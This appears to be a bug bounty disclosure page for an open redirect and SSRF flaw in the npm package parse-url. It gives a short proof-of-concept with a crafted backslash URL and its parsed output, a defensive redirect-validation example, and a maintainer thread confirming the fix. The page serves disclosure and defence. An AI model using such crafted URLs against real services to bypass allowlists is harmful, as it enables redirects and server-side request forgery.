Open Redirect in ionicabizau/parse-url

Valid

Reported on

Jul 8th 2021


✍️ Description

parse-url mishandles certain uses of backslash, such as https:/\, and interprets the URI as a relative path. Browsers accept backslashes after the protocol and treat them as normal slashes, while parse-url sees a relative path. This will lead to SSRF attacks, open redirects, or other undesired behavior.

Similar to CVE-2021-27515, CVE-2021-27516

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:

```js
// poc.js
var parseUrl = require("parse-url")
var u= parseUrl("https:/\/\/\github.com/foo/bar")
console.log(u)
```

  2. Execute the following commands in another terminal:

```sh
npm i parse-url # Install affected module
node poc.js #  Run the PoC
```

  3. Check the Output:

```
{
  protocols: [ 'https' ],
  protocol: 'https',
  port: null,
  resource: '',
  user: '',
  pathname: '/github.com/foo/bar',
  hash: '',
  search: '',
  href: 'https:///github.com/foo/bar',
  query: [Object: null prototype] {}
}
```

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
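
The allowlist bypass described above comes from checking one parser's view of the URL while the browser acts on another. The following is an added example, not code from parse-url or from this report: it validates a redirect target with Node's built-in WHATWG `URL`, which normalises backslashes the way browsers do. `APP_ORIGIN`, `ALLOWED_HOSTS`, `looksLocal` and `checkRedirect` are assumed names, and `REPORTED_PARSE` copies fields from the PoC output above.

```javascript
// Added example; the origin, the allowlist and all function names are assumptions.
const APP_ORIGIN = "https://app.example";
const ALLOWED_HOSTS = new Set(["app.example"]);

// The report's URL with literal backslashes (written "\\" in JS source).
const REPORTED_INPUT = "https:/\\/\\/\\github.com/foo/bar";

// Fields copied from the parse-url output shown in the report.
const REPORTED_PARSE = {
  protocol: "https",
  resource: "",
  pathname: "/github.com/foo/bar",
};

// Hypothetical fragile check: an empty host field is taken to mean "local path".
function looksLocal(parsed) {
  return parsed.resource === "";
}

// Decide on the host a browser will actually use. The WHATWG parser treats
// "\" like "/" after a special scheme, so it recovers the real authority.
function checkRedirect(input) {
  let url;
  try {
    url = new URL(input, APP_ORIGIN); // relative inputs resolve against our origin
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (url.protocol !== "https:") {
    return { ok: false, reason: "scheme", host: url.hostname };
  }
  if (url.username || url.password) {
    return { ok: false, reason: "credentials", host: url.hostname };
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    return { ok: false, reason: "host", host: url.hostname };
  }
  return { ok: true, href: url.href }; // redirect to the normalised form only
}

console.log(looksLocal(REPORTED_PARSE));      // fragile check accepts the target
console.log(checkRedirect(REPORTED_INPUT));   // rejected: host is github.com
console.log(checkRedirect("/account?tab=1")); // same-origin path is allowed
```

Redirecting to the returned `href` rather than to the raw input keeps the validated value and the value sent to the browser identical.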

Occurrences

We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a year ago
Ionică Bizău (Johnny B.) validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome
a year ago

Admin


@Ionica, do we have a fix for this yet, that we can confirm on the platform?

Ionică
a year ago

Maintainer


As far as I know, there is no fix yet… Contributions are welcome like always and I’ll be happy to release a new version once we have a fix.

Thank you.

Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
index.js#L35 has been validated